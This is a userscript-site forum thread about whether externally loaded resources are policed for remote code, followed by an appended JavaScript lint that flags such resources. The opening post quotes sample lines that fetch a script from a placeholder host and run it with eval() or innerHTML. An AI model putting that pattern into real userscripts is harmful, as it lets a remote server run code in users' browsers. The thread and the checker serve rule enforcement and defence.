
Discussions » Greasy Fork Feedback

Remote Code Injection

§
Posted: 26/02/2022
Edited: 26/02/2022

I was browsing topics and came across the following:

Is it possible to use "fetch()" in a script?
JasonBarnabe
To be clear, Greasy Fork does not allow running scripts from unauthorized places. If the content is just data though (like JSON), then it's fine.

Are @require & @resource monitored for such?

Examples based on actual userscripts on GF.

// @resource        remoteCode http://www.someSite.com/badJS.js
// @resource        remoteDom  http://www.someSite.com/htmlWithBadJS.html

// The resource is fetched as text, then executed as script.
const js = GM_getResourceText('remoteCode');
eval(js);

// The resource HTML is inserted into the page, so script embedded in the markup can run there.
const dom = GM_getResourceText('remoteDom');
element.innerHTML = dom;
§
Posted: 26/02/2022

https://greasyfork.org/en/help/code-rules

https://greasyfork.org/en/help/external-scripts

I think your code is okay, but if it wasn't using // @resource it would be removed.

§
Posted: 26/02/2022

Are @require & @resource monitored for such?

@require is automatically monitored, @resource is not. There is no distinction between the two as far as the rules go, but the distinction is technical in that you can use @resource for non-script content, so it's not currently checked automatically.

// @resource remoteCode http://www.someSite.com/badJS.js

Not allowed according to the rules.

// @resource remoteDom http://www.someSite.com/htmlWithBadJS.html

Not allowed according to the rules (the HTML contains JS which is then executed).

§
Posted: 26/02/2022
Edited: 26/02/2022

As per your stats from Github, there are many scripts that use @resource for possibly executable content e.g.

  "cjs": 9,
  "js": 268,

  "html": 43,
  "xml": 3,
  "xul": 1,
§
Posted: 26/02/2022

Only in the case where:

  • These contain executable script
  • These are outside of the allowed sources
  • These URLs are not for the same site the script affects

is it against the rules.
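The three conditions in the reply above (executable content, a source outside the allow-list, and a host that is not the script's own target site), together with the @require/@resource distinction from the earlier reply, turned into a small metadata lint. This is an added example, not Greasy Fork's own checker: the allow-list of hosts, the list of executable file extensions and the sample userscript are constructed assumptions, and the two @resource lines in the sample are modelled on the ones quoted in the thread.

```javascript
// Added example, not Greasy Fork's own checker: lint a userscript's metadata
// block and flag @require/@resource URLs that can carry executable content
// from a host that is neither allow-listed nor one of the sites the script
// targets. Allow-list, extension list and sample script are constructed.

// Hypothetical allow-list; the real one lives at greasyfork.org/en/help/external-scripts.
const ALLOWED_HOSTS = new Set(["cdn.jsdelivr.net", "cdnjs.cloudflare.com"]);

// File types that carry script which runs when handed to eval() or innerHTML.
const EXECUTABLE_EXT = new Set(["js", "cjs", "mjs", "html", "htm", "xml", "xul"]);

// Pull "// @key value" pairs out of the ==UserScript== block.
function parseMetadata(source) {
  const block = source.match(/\/\/ ==UserScript==([\s\S]*?)\/\/ ==\/UserScript==/);
  if (!block) throw new Error("no ==UserScript== block");
  const entries = [];
  for (const line of block[1].split("\n")) {
    const m = line.match(/^\s*\/\/\s*@(\S+)\s+(.*?)\s*$/);
    if (m) entries.push({ key: m[1], value: m[2] });
  }
  return entries;
}

function hostOf(url) {
  try { return new URL(url).hostname.toLowerCase(); } catch { return null; }
}

function extensionOf(url) {
  try {
    const last = new URL(url).pathname.split("/").pop();
    const dot = last.lastIndexOf(".");
    return dot === -1 ? "" : last.slice(dot + 1).toLowerCase();
  } catch { return ""; }
}

// Hosts the script affects, taken from @match/@include patterns such as
// "*://*.example.com/*"; the leading "*." is dropped so subdomains count as same site.
function targetHosts(entries) {
  const hosts = new Set();
  for (const { key, value } of entries) {
    if (key !== "match" && key !== "include") continue;
    const m = value.match(/^[^:]+:\/\/([^/]+)/);
    if (m) hosts.add(m[1].replace(/^\*\./, "").toLowerCase());
  }
  return hosts;
}

function isSameSite(host, targets) {
  for (const t of targets) if (host === t || host.endsWith("." + t)) return true;
  return false;
}

// One finding per @require/@resource URL that meets all three conditions.
function lintExternalCode(source) {
  const entries = parseMetadata(source);
  const targets = targetHosts(entries);
  const findings = [];
  for (const { key, value } of entries) {
    if (key !== "require" && key !== "resource") continue;
    // @resource is "name url"; @require is just "url" (possibly with a #sha256= suffix).
    const parts = value.split(/\s+/);
    const name = key === "resource" ? parts[0] : null;
    const url = (key === "resource" ? parts[1] : parts[0]) || "";
    const host = hostOf(url);
    if (!host) { findings.push({ key, name, url, reason: "unparseable URL" }); continue; }
    const executable = EXECUTABLE_EXT.has(extensionOf(url));
    if (executable && !ALLOWED_HOSTS.has(host) && !isSameSite(host, targets)) {
      findings.push({ key, name, url, reason: `executable content from unapproved host ${host}` });
    }
  }
  return findings;
}

// Constructed sample: two lines modelled on the thread, plus allowed, data-only and same-site cases.
const SAMPLE = `
// ==UserScript==
// @name         demo
// @match        *://example.com/*
// @require      https://cdn.jsdelivr.net/npm/some-lib@1.0.0/dist/lib.js
// @resource     remoteCode http://www.someSite.com/badJS.js
// @resource     remoteDom  http://www.someSite.com/htmlWithBadJS.html
// @resource     config     https://www.someSite.com/config.json
// @resource     ownHelper  https://static.example.com/helper.js
// ==/UserScript==
`;

if (typeof require !== "undefined" && require.main === module) {
  for (const f of lintExternalCode(SAMPLE)) {
    console.log(`${f.key} ${f.name ?? ""} ${f.url}: ${f.reason}`);
  }
}
```

Run with `node lint.js`; on the sample it reports only `remoteCode` and `remoteDom`. The JSON resource passes because nothing executes it, and the same-site helper passes because its host sits under the script's @match host. The extension check is deliberately a heuristic: a server can serve script under any name, so a real checker would also look at the fetched content type, which this offline example does not do.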
